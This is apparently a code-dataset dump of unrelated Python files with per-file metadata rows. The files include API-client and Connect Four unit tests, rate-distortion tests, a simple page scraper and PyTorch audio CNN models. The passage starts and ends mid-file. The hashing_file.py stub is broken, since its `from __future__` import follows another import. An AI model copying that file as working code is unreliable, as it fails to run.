        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.body['decisions']['account_takeover']['decision']['id'],
                         'session_decision')
def test_get_content_decisions(self):
    """Test GET /v3/accounts/{accountId}/users/{userId}/content/{contentId}/decisions."""
    mock_response = mock.Mock()
    mock_response.content = """
    {
        "decisions": {
            "content_abuse": {
                "decision": {
                    "id": "content_looks_bad_content_abuse"
                },
                "time": 1468517407135,
                "webhook_succeeded": true
            }
        }
    }
    """
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        mock_get.return_value = mock_response
        response = self.sift_client.get_content_decisions('example_user', 'example_content')
        mock_get.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/users/example_user/content/example_content/decisions',
            headers=mock.ANY, auth=mock.ANY, timeout=mock.ANY)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.body['decisions']['content_abuse']['decision']['id'],
                         'content_looks_bad_content_abuse')
def test_provided_session(self):
    """A caller-supplied requests session must be used for HTTP calls."""
    provided_session = mock.Mock()
    client = sift.Client(api_key=self.test_key, account_id=self.account_id,
                         session=provided_session)
    stub_response = mock.Mock()
    stub_response.content = '{"status": 0, "error_message": "OK"}'
    stub_response.json.return_value = json.loads(stub_response.content)
    stub_response.status_code = 200
    stub_response.headers = response_with_data_header()
    provided_session.post.return_value = stub_response
    client.track('$transaction', valid_transaction_properties())
    # The injected session, not a client-internal one, must be hit exactly once.
    provided_session.post.assert_called_once()
def main():
    """Run the unittest test runner over this module."""
    unittest.main()


# Allow running the test module directly as a script.
if __name__ == '__main__':
    main()
| 41.669983
| 119
| 0.581705
| 5,301
| 50,254
| 5.219393
| 0.057914
| 0.085008
| 0.044022
| 0.021975
| 0.864139
| 0.843068
| 0.818671
| 0.788022
| 0.768541
| 0.754446
| 0
| 0.026954
| 0.3031
| 50,254
| 1,205
| 120
| 41.704564
| 0.763063
| 0.014188
| 0
| 0.63814
| 0
| 0.004651
| 0.264572
| 0.013208
| 0
| 0
| 0
| 0
| 0.173953
| 1
| 0.053953
| false
| 0
| 0.009302
| 0.004651
| 0.068837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
acee07184eccee56bc00263e8140ad8eabcf1233
| 1,373
|
py
|
Python
|
Paris/2015/2015-05-21-Power4-Python-Randori/power4_test.py
|
murex/coding-dojo
|
7e84cc971f6716d9ff2c3cbf22c11cfe93d8d275
|
[
"MIT"
] | 10
|
2015-08-05T15:27:06.000Z
|
2018-10-10T13:57:42.000Z
|
Paris/2015/2015-05-21-Power4-Python-Randori/power4_test.py
|
murex/coding-dojo
|
7e84cc971f6716d9ff2c3cbf22c11cfe93d8d275
|
[
"MIT"
] | 6
|
2015-09-09T14:04:18.000Z
|
2016-09-01T19:46:50.000Z
|
Paris/2015/2015-05-21-Power4-Python-Randori/power4_test.py
|
murex/coding-dojo
|
7e84cc971f6716d9ff2c3cbf22c11cfe93d8d275
|
[
"MIT"
] | 10
|
2015-08-12T12:26:42.000Z
|
2016-03-09T12:44:06.000Z
|
import power4
#def test_final():
# assert power4.isOver([
# [0, 1, 2, 1, 2, 1, 1],
# [0, 2, 1, 1, 1, 2, 2],
# [0, 1, 2, 2, 2, 1, 1],
# [1, 2, 1, 1, 1, 2, 2],
# [2, 1, 1, 2, 2, 2, 1],
# [1, 2, 2, 1, 2, 1, 2],
# ]) == True
def test_p1_win_one_line():
    """Player 1 has four in a row on a single-row board: game is over."""
    # Truthiness assert instead of '== True' (lint E712).
    assert power4.isOver([[0, 1, 1, 1, 1, 2, 1]])
def test_p2_win_one_line():
    """Player 2 has four in a row on a single-row board: game is over."""
    # Truthiness assert instead of '== True' (lint E712).
    assert power4.isOver([[0, 1, 2, 2, 2, 2, 1]])
def test_draw_one_line():
    """No four-in-a-row on a single-row board: game is not over."""
    # 'not ...' instead of '== False' (lint E712).
    assert not power4.isOver([[0, 1, 2, 1, 2, 2, 1]])
def test_p1_win_with_two_lines():
    """Player 1 wins on the second row of a two-row board."""
    assert power4.isOver([
        [0, 1, 2, 1, 2, 2, 1],
        [0, 1, 1, 1, 1, 2, 1]
    ])
def test_p1_wins_one_column():
    """Player 1 has four vertically in a single-column board."""
    assert power4.isOver([
        [0],
        [0],
        [1],
        [1],
        [1],
        [1]
    ])
def test_p2_wins_one_column():
    """Player 2 has four vertically in a single-column board."""
    assert power4.isOver([
        [0],
        [0],
        [2],
        [2],
        [2],
        [2]
    ])
def test_p1_wins_column_in_two_wide_board():
    """Player 1 has four vertically in the second column of a two-wide board.

    Renamed: this function previously reused the name
    ``test_p2_wins_one_column`` and silently shadowed the earlier test,
    so only one of the two ever ran.
    """
    assert power4.isOver([
        [0, 0],
        [0, 0],
        [0, 1],
        [2, 1],
        [2, 1],
        [2, 1]
    ])
def test_diagonal():
    """Player 1 has four on a diagonal of a full-size board."""
    assert power4.isOver([
        [0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 1],
        [0, 0, 0, 0, 0, 1, 2],
        [0, 0, 0, 0, 1, 2, 1],
        [0, 0, 0, 1, 2, 1, 2],
    ])
| 24.087719
| 58
| 0.405681
| 229
| 1,373
| 2.30131
| 0.104803
| 0.129032
| 0.1537
| 0.166983
| 0.844402
| 0.777989
| 0.721063
| 0.673624
| 0.402277
| 0.375712
| 0
| 0.184455
| 0.372178
| 1,373
| 57
| 59
| 24.087719
| 0.426914
| 0.172615
| 0
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.166667
| true
| 0
| 0.020833
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4a0bdd636cedff721af320c0b637a31b7f175f00
| 118
|
py
|
Python
|
scripts/hashing_file.py
|
Pyt45/algorithms-dataStructure-python
|
d88a5225e49dd1cbce5363b1f88c0f207a301d5c
|
[
"MIT"
] | null | null | null |
scripts/hashing_file.py
|
Pyt45/algorithms-dataStructure-python
|
d88a5225e49dd1cbce5363b1f88c0f207a301d5c
|
[
"MIT"
] | null | null | null |
scripts/hashing_file.py
|
Pyt45/algorithms-dataStructure-python
|
d88a5225e49dd1cbce5363b1f88c0f207a301d5c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import hashlib
from __future__ import annotations
def hash_file(filepath: str) -> str:
pass
| 19.666667
| 36
| 0.754237
| 17
| 118
| 4.941176
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152542
| 118
| 6
| 37
| 19.666667
| 0.84
| 0.169492
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
4a18df85db89a74d3a14478fc1fd46600e185ad1
| 75
|
py
|
Python
|
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
# Smoke test: succeeds only when the running interpreter can import
# concurrent.futures — presumably used to verify interpreter/resolver
# selection (TODO confirm against the harness that runs this script).
from concurrent.futures import Future

print(Future)
print('Successful.')
| 12.5
| 37
| 0.786667
| 9
| 75
| 6.555556
| 0.777778
| 0.372881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 75
| 5
| 38
| 15
| 0.880597
| 0
| 0
| 0
| 0
| 0
| 0.146667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
c580949857f3976fb370e53d68493dbcf3c4bb72
| 26
|
py
|
Python
|
src/torchphysics/problem/domains/domain3D/__init__.py
|
uwe-iben/torchphysics
|
f0a56539cff331d49caaa90bc2fdd0d238b298f8
|
[
"Apache-2.0"
] | 203
|
2021-11-10T10:33:29.000Z
|
2022-03-26T09:05:12.000Z
|
src/torchphysics/problem/domains/domain3D/__init__.py
|
DKreuter/torchphysics
|
775d9aca71752a568f1fca972c958b99107f3b7c
|
[
"Apache-2.0"
] | 3
|
2022-01-07T19:57:00.000Z
|
2022-03-10T08:04:49.000Z
|
src/torchphysics/problem/domains/domain3D/__init__.py
|
DKreuter/torchphysics
|
775d9aca71752a568f1fca972c958b99107f3b7c
|
[
"Apache-2.0"
] | 16
|
2021-09-30T08:35:37.000Z
|
2022-03-16T13:12:22.000Z
|
from .sphere import Sphere
| 26
| 26
| 0.846154
| 4
| 26
| 5.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c5bb672121f33a73d318922d931854a9e1e22879
| 4,148
|
py
|
Python
|
dit/rate_distortion/tests/test_curves.py
|
leoalfonso/dit
|
e7d5f680b3f170091bb1e488303f4255eeb11ef4
|
[
"BSD-3-Clause"
] | 1
|
2021-03-15T08:51:42.000Z
|
2021-03-15T08:51:42.000Z
|
dit/rate_distortion/tests/test_curves.py
|
leoalfonso/dit
|
e7d5f680b3f170091bb1e488303f4255eeb11ef4
|
[
"BSD-3-Clause"
] | null | null | null |
dit/rate_distortion/tests/test_curves.py
|
leoalfonso/dit
|
e7d5f680b3f170091bb1e488303f4255eeb11ef4
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Tests for dit.rate_distortion.curves
"""
from __future__ import division
import pytest
import numpy as np
from dit import Distribution
from dit.rate_distortion.curves import IBCurve, RDCurve
from dit.rate_distortion.distortions import hamming, maximum_correlation, residual_entropy
from dit.shannon import entropy
@pytest.mark.flaky(reruns=5)
def test_simple_rd_1():
    """Test against a known result, using scipy."""
    uniform = Distribution(['0', '1'], [1/2, 1/2])
    curve = RDCurve(uniform, beta_num=10)
    for rate, distortion in zip(curve.rates, curve.distortions):
        assert rate == pytest.approx(1 - entropy(distortion))
@pytest.mark.flaky(reruns=5)
def test_simple_rd_2():
    """Test against a known result, using scipy."""
    uniform = Distribution(['0', '1'], [1/2, 1/2])
    curve = RDCurve(uniform, rv=[0], beta_num=10, alpha=0.5,
                    distortion=maximum_correlation)
    assert curve.distortions[0] == pytest.approx(1.0)
@pytest.mark.flaky(reruns=5)
def test_simple_rd_3():
    """Test against a known result, using scipy."""
    joint = Distribution(['00', '01', '10', '11'], [1/4]*4)
    curve = RDCurve(joint, rv=[0], crvs=[1], beta_num=10, alpha=0.5,
                    distortion=maximum_correlation)
    assert curve.distortions[0] == pytest.approx(1.0)
@pytest.mark.flaky(reruns=5)
def test_simple_rd_4():
    """Test against a known result, using scipy."""
    uniform = Distribution(['0', '1'], [1/2, 1/2])
    curve = RDCurve(uniform, beta_num=10, alpha=0.0,
                    distortion=residual_entropy)
    assert curve.distortions[0] == pytest.approx(1.0)
@pytest.mark.flaky(reruns=5)
def test_simple_rd_5():
    """Test against a known result, using blahut-arimoto."""
    uniform = Distribution(['0', '1'], [1/2, 1/2])
    curve = RDCurve(uniform, beta_num=10, method='ba')
    for rate, distortion in zip(curve.rates, curve.distortions):
        assert rate == pytest.approx(1 - entropy(distortion))
@pytest.mark.flaky(reruns=5)
def test_simple_rd_6():
    """Test against a known result, using blahut-arimoto."""
    uniform = Distribution(['0', '1'], [1/2, 1/2])
    curve = RDCurve(uniform, rv=[0], beta_num=10, beta_max=None, method='ba',
                    distortion=residual_entropy)
    assert curve.distortions[0] == pytest.approx(2.0)
@pytest.mark.flaky(reruns=5)
def test_simple_ib_1():
    """Test against known values."""
    dist = Distribution(['00', '02', '12', '21', '22'], [1/5]*5)
    curve = IBCurve(dist, rvs=[[0], [1]], beta_max=10, beta_num=21)
    # index -> (expected complexity, expected relevance)
    expected = {
        2: (0.0, 0.0),
        5: (0.8, 0.4),
        20: (1.5129028136502387, 0.5701613885745838),
    }
    for idx, (complexity, relevance) in expected.items():
        assert curve.complexities[idx] == pytest.approx(complexity, abs=1e-4)
        assert curve.relevances[idx] == pytest.approx(relevance, abs=1e-4)
    assert 3.0 in curve.find_kinks()
@pytest.mark.flaky(reruns=5)
def test_simple_ib_2():
    """Test against known values."""
    dist = Distribution(['00', '02', '12', '21', '22'], [1/5]*5)
    curve = IBCurve(dist, beta_max=None, beta_num=21, alpha=0.0)
    # index -> (expected complexity, expected relevance)
    expected = {
        2: (0.0, 0.0),
        12: (0.97095059445466858, 0.4199730940219748),
        20: (1.5219280948873621, 0.5709505944546684),
    }
    for idx, (complexity, relevance) in expected.items():
        assert curve.complexities[idx] == pytest.approx(complexity, abs=1e-4)
        assert curve.relevances[idx] == pytest.approx(relevance, abs=1e-4)
@pytest.mark.flaky(reruns=5)
def test_simple_ib_3():
    """Test against known values."""
    dist = Distribution(['00', '02', '12', '21', '22'], [1/5]*5)
    curve = IBCurve(dist, beta_max=None, beta_num=21, alpha=0.5)
    # index -> (expected complexity, expected relevance)
    expected = {
        2: (0.0, 0.0),
        5: (0.8522009308325029, 0.4080081559717983),
        20: (1.5219280948873621, 0.5709505944546684),
    }
    for idx, (complexity, relevance) in expected.items():
        assert curve.complexities[idx] == pytest.approx(complexity, abs=1e-4)
        assert curve.relevances[idx] == pytest.approx(relevance, abs=1e-4)
| 33.723577
| 100
| 0.654532
| 640
| 4,148
| 4.157813
| 0.140625
| 0.10823
| 0.040586
| 0.072153
| 0.814356
| 0.806088
| 0.806088
| 0.806088
| 0.788425
| 0.701616
| 0
| 0.115619
| 0.168033
| 4,148
| 122
| 101
| 34
| 0.655462
| 0.088959
| 0
| 0.485714
| 0
| 0
| 0.014301
| 0
| 0
| 0
| 0
| 0
| 0.357143
| 1
| 0.128571
| false
| 0
| 0.1
| 0
| 0.228571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c5d0c67ebbc995217c9f97f77ee9c1f0c4fdee29
| 97
|
py
|
Python
|
ETC/CCC/__init__.py
|
pranaysy/ETCPy
|
d08c50ae5e379ee11cc9d9eb076ae4319516314c
|
[
"Apache-2.0"
] | 10
|
2020-07-30T12:03:24.000Z
|
2022-02-14T17:45:29.000Z
|
ETC/CCC/__init__.py
|
pranaysy/ETCPy
|
d08c50ae5e379ee11cc9d9eb076ae4319516314c
|
[
"Apache-2.0"
] | null | null | null |
ETC/CCC/__init__.py
|
pranaysy/ETCPy
|
d08c50ae5e379ee11cc9d9eb076ae4319516314c
|
[
"Apache-2.0"
] | 2
|
2021-02-18T07:20:34.000Z
|
2021-03-15T04:10:33.000Z
|
#
from ETC.CCC.compute_CCC import compute, get_params
from ETC.CCC.simulate_AR import coupled_AR
| 24.25
| 51
| 0.835052
| 17
| 97
| 4.529412
| 0.588235
| 0.181818
| 0.25974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103093
| 97
| 3
| 52
| 32.333333
| 0.885057
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c5dba45eb7f0e76474acbeffd19721d126204324
| 2,070
|
py
|
Python
|
airflow_docker/dags/robots/my_robots.py
|
GeorgeManakanatas/AirflowScraping
|
07be17d5dee1135cba267a2b4ca742e21391f529
|
[
"Apache-2.0"
] | 1
|
2020-09-14T05:16:48.000Z
|
2020-09-14T05:16:48.000Z
|
airflow_docker/dags/robots/my_robots.py
|
GeorgeManakanatas/AirflowScraping
|
07be17d5dee1135cba267a2b4ca742e21391f529
|
[
"Apache-2.0"
] | null | null | null |
airflow_docker/dags/robots/my_robots.py
|
GeorgeManakanatas/AirflowScraping
|
07be17d5dee1135cba267a2b4ca742e21391f529
|
[
"Apache-2.0"
] | null | null | null |
from config import my_config
from bs4 import BeautifulSoup
import requests
import logging
# Load the configuration file once at import time; my_config keeps the parsed
# values in module-level state used by the scrapers below.
my_config.config_file()
# Module-wide logger shared by all scraping functions in this file.
logger = logging.getLogger('scraping')
def get_page(page_url):
    '''
    Checks if the page returns a 200 code and if so retrieves its content.

    Parameters:
        page_url (str): The page url

    Returns:
        str: The decoded page contents, or 'null' on failure
        bool: True if the status code is 200, False otherwise
    '''
    logger.info('Checking access for page : %s', page_url)
    try:
        # making request to page
        request_page = requests.get(page_url)
        logger.info(request_page)
        # working with the reply
        if request_page.status_code == 200:
            logger.info('Return code 200 for : %s', page_url)
            request_page = request_page.content.decode()
            logger.info('Page content is:\n\n %s \n\n', str(request_page))
            return request_page, True
        else:
            logger.warning('Return code not 200 for : %s', page_url)
            return 'null', False
    except Exception as exc:
        # Bug fix: this branch previously fell through, implicitly returning
        # None and breaking callers that unpack a (content, ok) tuple.
        logger.error('Error accessing the page: %s', exc)
        return 'null', False
def get_page_with_soup(page_url):
    '''
    Checks if the page returns a 200 code and if so returns the raw response.

    NOTE(review): despite the name, this function never builds a
    BeautifulSoup object — it returns the requests Response unparsed;
    confirm whether soup parsing was intended here.

    Parameters:
        page_url (str): The page url

    Returns:
        requests.Response or str: the response object, or 'null' on failure
        bool: True if the status code is 200, False otherwise
    '''
    logger.info('Checking access for page : %s', page_url)
    try:
        # making request to page
        request_page = requests.get(page_url)
        logger.info(request_page)
        # working with the reply
        if request_page.status_code == 200:
            logger.info('Return code 200 for : %s', page_url)
            return request_page, True
        else:
            logger.warning('Return code not 200 for : %s', page_url)
            return 'null', False
    except Exception as exc:
        # Bug fix: this branch previously fell through, implicitly returning
        # None and breaking callers that unpack a (content, ok) tuple.
        logger.error('Error accessing the page: %s', exc)
        return 'null', False
| 29.571429
| 74
| 0.619324
| 278
| 2,070
| 4.496403
| 0.248201
| 0.0784
| 0.0384
| 0.0352
| 0.7696
| 0.7696
| 0.7696
| 0.7696
| 0.7696
| 0.7696
| 0
| 0.021321
| 0.297585
| 2,070
| 69
| 75
| 30
| 0.838377
| 0.277295
| 0
| 0.705882
| 0
| 0
| 0.184659
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.117647
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a8463fc5e1d38e1a8eb60e84c0781ed90ff42d15
| 133
|
py
|
Python
|
thenewboston_node/core/utils/dataclass.py
|
MLonTNB/thenewboston-node
|
3fbd0fc36c4f0eabaa8267f2a0be2fd717f133d1
|
[
"MIT"
] | null | null | null |
thenewboston_node/core/utils/dataclass.py
|
MLonTNB/thenewboston-node
|
3fbd0fc36c4f0eabaa8267f2a0be2fd717f133d1
|
[
"MIT"
] | null | null | null |
thenewboston_node/core/utils/dataclass.py
|
MLonTNB/thenewboston-node
|
3fbd0fc36c4f0eabaa8267f2a0be2fd717f133d1
|
[
"MIT"
] | null | null | null |
import typing
def is_optional(type_):
    """Return True if *type_* is an Optional-like union (one including None).

    Handles both ``typing.Optional[X]`` / ``typing.Union[X, None]`` and,
    on Python 3.10+, PEP 604 unions written as ``X | None`` (whose origin is
    ``types.UnionType``, not ``typing.Union``). Backward compatible: all
    inputs the original accepted give the same answer.
    """
    import types  # local import keeps the module-level import surface unchanged
    origin = typing.get_origin(type_)
    is_union = (origin is typing.Union
                or origin is getattr(types, 'UnionType', None))
    # Even if is_union is spuriously true (origin None on pre-3.10), a
    # non-generic type has no args, so the membership test still returns False.
    return is_union and type(None) in typing.get_args(type_)
| 22.166667
| 92
| 0.774436
| 22
| 133
| 4.409091
| 0.636364
| 0.185567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135338
| 133
| 5
| 93
| 26.6
| 0.843478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
a88db185fce449065e50d7b74d2e9e2a98e4c0b9
| 7,673
|
py
|
Python
|
experiments/UrbanSound8K/models/OneDCNN_Abdoli2019.py
|
RomeroGuDw/wavelet_networks
|
0fd6871ff9f03a3cb26f1c414728aed89a33b99c
|
[
"MIT"
] | 59
|
2020-06-12T09:16:52.000Z
|
2022-03-10T09:30:58.000Z
|
experiments/UrbanSound8K/models/OneDCNN_Abdoli2019.py
|
RomeroGuDw/wavelet_networks
|
0fd6871ff9f03a3cb26f1c414728aed89a33b99c
|
[
"MIT"
] | 1
|
2020-09-13T01:43:44.000Z
|
2022-02-16T14:33:18.000Z
|
experiments/UrbanSound8K/models/OneDCNN_Abdoli2019.py
|
RomeroGuDw/wavelet_networks
|
0fd6871ff9f03a3cb26f1c414728aed89a33b99c
|
[
"MIT"
] | 1
|
2020-07-31T14:23:43.000Z
|
2020-07-31T14:23:43.000Z
|
# torch
import torch
import torch.nn as nn
# built-in
import functools
# project
import eerie
class OneDCNN(torch.nn.Module):
def __init__(self, use_bias=False):
super(OneDCNN, self).__init__()
# Parameters of the model
use_bias = False
eps = 2e-5
n_channels = 16
n_classes = 10
out_space_dim = 6
dp_rate = 0.25
# Conv Layers
self.c1 = torch.nn.Conv1d(in_channels=1, out_channels=n_channels, kernel_size=64, stride=2, padding=(64 // 2), dilation=1, bias=use_bias)
self.c2 = torch.nn.Conv1d(in_channels=n_channels, out_channels=n_channels * 2, kernel_size=32, stride=2, padding=(32 // 2), dilation=1, bias=use_bias)
self.c3 = torch.nn.Conv1d(in_channels=n_channels * 2, out_channels=n_channels * 4, kernel_size=16, stride=2, padding=(16 // 2), dilation=1, bias=use_bias)
self.c4 = torch.nn.Conv1d(in_channels=n_channels * 4, out_channels=n_channels * 8, kernel_size=8, stride=2, padding=(8 // 2), dilation=1, bias=use_bias)
self.c5 = torch.nn.Conv1d(in_channels=n_channels * 8, out_channels=n_channels * 16, kernel_size=4, stride=2, padding=(4 // 2), dilation=1, bias=use_bias)
# Fully connected
self.f1 = torch.nn.Linear(in_features=n_channels * 16 * out_space_dim, out_features=n_channels * 8, bias=True)
self.f2 = torch.nn.Linear(in_features=n_channels * 8, out_features=n_channels * 4, bias=True)
self.f3 = torch.nn.Linear(in_features=n_channels * 4, out_features=n_classes, bias=True)
# BatchNorm Layers
self.bn1 = torch.nn.BatchNorm1d(num_features=n_channels, eps=eps)
self.bn2 = torch.nn.BatchNorm1d(num_features=n_channels * 2, eps=eps)
self.bn3 = torch.nn.BatchNorm1d(num_features=n_channels * 4, eps=eps)
self.bn4 = torch.nn.BatchNorm1d(num_features=n_channels * 8, eps=eps)
self.bn5 = torch.nn.BatchNorm1d(num_features=n_channels * 16, eps=eps)
# Pooling
self.pool = torch.max_pool1d
# DropOut
self.dropout = torch.nn.Dropout(p=dp_rate)
# Initialization
for m in self.modules():
if isinstance(m, nn.Conv1d) or isinstance(m, nn.Linear):
m.weight.data.normal_(0, torch.prod(torch.Tensor(list(m.weight.shape)[1:]))**(-1/2))
if use_bias: m.bias.data.fill_(0.0)
def forward(self, x):
# Conv-layers
out = self.bn1(torch.relu(self.c1(x)))
out = self.pool(out, kernel_size=8, stride=8, padding=0)
out = self.bn2(torch.relu(self.c2(out)))
out = self.pool(out, kernel_size=8, stride=8, padding=0)
out = self.bn3(torch.relu(self.c3(out)))
out = self.bn4(torch.relu(self.c4(out)))
out = self.bn5(torch.relu(self.c5(out)))
out = self.pool(out, kernel_size=5, stride=5, padding=0)
# Fully connected lyrs
out = out.view(out.size(0), -1)
out = self.dropout(self.f1(out))
out = self.dropout(self.f2(out))
out = self.f3(out)
return out
class RRPlus_OneDCNN(torch.nn.Module):
    """Group-equivariant (R1R+) variant of OneDCNN built on eerie G-convs.

    Strided convolutions are replaced by stride-1 G-convolutions followed by
    explicit max pooling steps.
    """

    def __init__(self, use_bias=False):
        """Build the layers.

        Args:
            use_bias (bool): use bias terms in the G-conv layers. Bug fix:
                the original body reassigned ``use_bias = False``
                unconditionally, silently ignoring this argument; the
                reassignment is removed (the default preserves the old
                behavior).
        """
        super(RRPlus_OneDCNN, self).__init__()
        # Parameters of the model
        eps = 2e-5
        n_channels = 12
        n_classes = 10
        out_space_dim = 6
        dp_rate = 0.25
        # # G-conv approach
        group = eerie.Group('R1R+')
        # For first layer:
        N_h_RdG = 9
        base = 2
        h_grid_RdG = group.h_grid_global(N_h_RdG, base ** (N_h_RdG - 1))
        print(h_grid_RdG.grid)
        N_h_crop = 3  # <--- TODO: not sure if this is the most optimal though, but it reduces the h_axis nicely to size 1 in the last layer
        base = 2
        h_grid_crop = group.h_grid_global(N_h_crop, base ** (N_h_crop - 1))
        print(h_grid_crop.grid)
        # Conv Layers
        self.c1 = eerie.nn.GConvRdG(group, in_channels=1, out_channels=n_channels, kernel_size=63, h_grid=h_grid_RdG, bias=use_bias, stride=1)
        self.c2 = eerie.nn.GConvGG(group, in_channels=n_channels, out_channels=n_channels * 2, kernel_size=31, h_grid=h_grid_crop, bias=use_bias, stride=1, h_crop=True)
        self.c3 = eerie.nn.GConvGG(group, in_channels=n_channels * 2, out_channels=n_channels * 4, kernel_size=15, h_grid=h_grid_crop, bias=use_bias, stride=1, h_crop=True)
        self.c4 = eerie.nn.GConvGG(group, in_channels=n_channels * 4, out_channels=n_channels * 8, kernel_size=7, h_grid=h_grid_crop, bias=use_bias, stride=1, h_crop=True)
        self.c5 = eerie.nn.GConvGG(group, in_channels=n_channels * 8, out_channels=n_channels * 16, kernel_size=3, h_grid=h_grid_crop, bias=use_bias, stride=1, h_crop=True)
        # Fully connected
        self.f1 = torch.nn.Linear(in_features=n_channels * 16 * out_space_dim, out_features=n_channels * 8, bias=True)
        self.f2 = torch.nn.Linear(in_features=n_channels * 8, out_features=n_channels * 4, bias=True)
        self.f3 = torch.nn.Linear(in_features=n_channels * 4, out_features=n_classes, bias=True)
        # BatchNorm Layers (2d: the G-conv output carries an extra h axis)
        self.bn1 = torch.nn.BatchNorm2d(num_features=n_channels, eps=eps)
        self.bn2 = torch.nn.BatchNorm2d(num_features=n_channels * 2, eps=eps)
        self.bn3 = torch.nn.BatchNorm2d(num_features=n_channels * 4, eps=eps)
        self.bn4 = torch.nn.BatchNorm2d(num_features=n_channels * 8, eps=eps)
        self.bn5 = torch.nn.BatchNorm2d(num_features=n_channels * 16, eps=eps)
        # Pooling
        self.pool = eerie.functional.max_pooling_R1
        # DropOut
